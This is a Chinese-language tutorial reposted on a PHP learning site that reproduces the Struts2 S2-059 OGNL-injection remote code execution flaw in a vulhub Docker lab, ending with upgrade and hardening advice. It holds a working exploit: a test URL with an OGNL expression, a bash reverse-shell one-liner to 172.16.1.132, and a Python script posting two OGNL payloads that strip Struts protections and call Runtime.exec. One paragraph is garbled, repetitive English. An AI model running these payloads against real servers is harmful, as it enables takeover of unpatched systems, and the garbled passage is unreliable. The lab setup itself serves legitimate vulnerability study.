简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
首頁 > 運維 > 安全 > 主體

Struts2 S2-059 遠端程式碼執行漏洞復現是怎麼樣的

王林
發布: 2023-05-23 22:37:16
轉載
1484 人瀏覽過

0x00簡介

Struts2 是 Apache 軟體組織推出的一個相當強大的 Java Web 開源框架,本質上相當於一個 servlet。 Struts2 基於 MVC 架構,框架結構清晰。通常作為控制器(Controller)來建立模型與視圖的資料交互,用於創建企業級 Java web 應用程序,它利用並延伸了Java Servlet API,鼓勵開發者採用MVC架構。 Struts2以WebWork優秀的設計思想為核心,吸收了Struts框架的部分優點,提供了一個更整潔的MVC設計模式實現的Web應用程式框架。

0x01漏洞概述

攻擊者可以透過建構惡意的OGNL表達式,並將其設定到可被外部輸入進行修改,並且會執行OGNL表達式的Struts2標籤的屬性值,引發OGNL表達式解析,最終造成遠端程式碼執行的影響。

0x02影響範圍

Struts 2.0.0 – Struts 2.5.20

0x03環境建置

#1.本次漏洞環境使用vulhub快速搭建,vulhub下載位址如下:

https://github.com/vulhub/vulhub

cd vulhub-master/struts2/s2-059

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

2.使用docker-compose快速建立目標場環境

docker-compose up -d

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

3.啟動完成後在瀏覽器存取http://ip:8080/?id=1 就可以看到測試介面

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

0x04漏洞

1.在瀏覽器存取http://ip:8080/?id=%{88*88},可以發現執行的88*88成功被解析了,會執行OGNL表達式的Struts2標籤的屬性值,引發OGNL表達式解析。

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

2.使用poc來反彈shell,反彈shell的payload需要使用base64編碼

bash -i >& /dev/tcp/172.16. 1.132/9967 0>&1

base64編碼網址:

The original sentence is already a complete sentence that is providing a link. If I were to rewrite it, sentence that is providing a link. If I were to rewrite it, it could be something like be something like it, something like it, something like be something like be something like like like Here is a link to a webpage containing information about runtime exec payloads: http://www.jackson-t.ca/runtime-exec-payloads.html.

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

import requests

url = "http://127.0.0.1:8080"

data1 = {

"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"

}

data2 = {

"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('payload-base64编码'))}"

}

res1 = requests.post(url, data=data1)

res2 = requests.post(url, data=data2)
登入後複製

Struts2 S2-059 远程代码执行漏洞复现是怎么样的3.修改poc中的payload為自己的payload,然後使用python運行,可以看到反彈了shell

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

0x05修復建議

1.升級到Struts 2.5.22或更高版本

2. 開啟ONGL表達式註入保護措施。 ######https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable###

以上是Struts2 S2-059 遠端程式碼執行漏洞復現是怎麼樣的的詳細內容。更多資訊請關注PHP中文網其他相關文章!

相關標籤:
struts2
來源:yisu.com
上一篇:如何使用HCL進行Telnet遠端登入 下一篇:如何進行Cisco 2960配置
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
作者最新文章
最新問題
function_exists()無法判定自訂函數 function test()    {        return true;    }    if (function_exists('TEST')) {        ech...
來自於 2024-04-29 11:01:01
0
2
1800
google 瀏覽器 手機版顯示的怎麼實現 老師您好,google 瀏覽器怎麼變成手機版樣式的?
來自於 2024-04-23 00:22:19
0
10
1939
子窗口操作父窗口,輸出沒反應 前兩句可執行,最後一句沒辦法應
來自於 2024-04-19 15:37:47
0
1
1652
父視窗沒有輸出 document.onclick = function(){ window.opener.document.write('我是子視窗的輸出');                  ...
來自於 2024-04-18 23:52:34
0
1
1554
關於CSS心智圖的課件在哪? 課件
來自於 2024-04-16 10:10:18
0
0
1587
相關專題
更多>
熱門推薦
熱門教學
更多>
相關教學
熱門推薦
最新課程
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板
關於我們 免責聲明 Sitemap
PHP中文網:公益線上PHP培訓,幫助PHP學習者快速成長!